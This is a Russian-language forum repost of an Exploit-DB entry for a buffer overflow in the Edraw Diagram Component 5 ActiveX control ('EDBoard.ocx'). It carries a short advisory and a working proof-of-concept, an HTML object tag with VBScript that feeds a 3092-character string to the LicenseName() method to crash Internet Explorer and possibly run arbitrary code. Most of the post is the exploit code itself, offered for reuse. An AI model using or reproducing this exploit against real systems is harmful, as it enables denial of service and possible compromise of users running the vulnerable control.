Exploit Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36662
Проверка EDB
  1. Пройдено
Автор
SENATOR OF PIRATES
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2012-02-06
Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/51866/info

Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.

Edraw Diagram Component 5 is vulnerable; other versions may also be affected. 

Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype  = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid     = "EDBoardLib.EDBoard"
argCount   = 1
arg1=String(3092, "A")
target.LicenseName = arg1</script>
 
Источник
www.exploit-db.com

Похожие темы